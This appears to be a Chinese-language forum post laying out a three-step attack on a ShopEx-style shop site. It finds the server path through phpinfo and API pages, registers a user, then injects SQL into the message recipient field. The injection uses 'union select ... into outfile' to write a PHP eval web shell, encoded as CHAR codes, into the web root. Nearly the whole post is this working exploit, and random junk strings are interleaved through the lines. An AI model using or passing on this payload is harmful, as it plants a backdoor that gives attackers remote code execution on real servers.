第一个:想办法找到目标网站的绝对路径2 Z2 F7 b- ]$ Z' {/ k" F
, o) g9 K; t/ @$ N
http://www.political-security.com/install/svinfo.php?phpinfo=true
% D4 {) y3 j) {# z7 k+ C
$ I7 D! d) @! ^6 O2 D. S2 zhttp:/www.political-security.com/core/api/shop_api.php+ A2 l! Q' Z$ {. y' z/ I* ?
3 ]3 X7 c' H0 H! q
http://www.political-security.co ... api_b2b_2_0_cat.php# o4 F: C0 Z' v8 k
5 ~, P6 c% l! u7 `% y9 D$ Q/ M" q
http://www.political-security.com/core/ap ... b_2_0_goodstype.php
# g/ m5 x$ K8 ~4 p+ O+ z8 C( r E' A' z0 p) O
http://www.political-security.co ... i_b2b_2_0_brand.php
; t M" Q$ q; E9 c5 h, a第二个:注册一个普通用户
( F, c5 p d/ Z4 D4 b1 ^4 u- Y' s2 _3 C6 t
http://www.political-security.com/?passport-signup.html: L; J6 D6 [0 W3 J, T
6 X# H, A ~- i$ X; n k
第三个: 发送消息
) G; N- c& V# @% Z' Z' Q& X
& b& ^+ s" ~8 e. chttp://www.political-security.com/?member-send.html
# ~ b% M1 u: g发送给中填写
: D* U" E6 M) g$ `6 Y6 M0 J9 L2 r' dantian365.com' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php' # |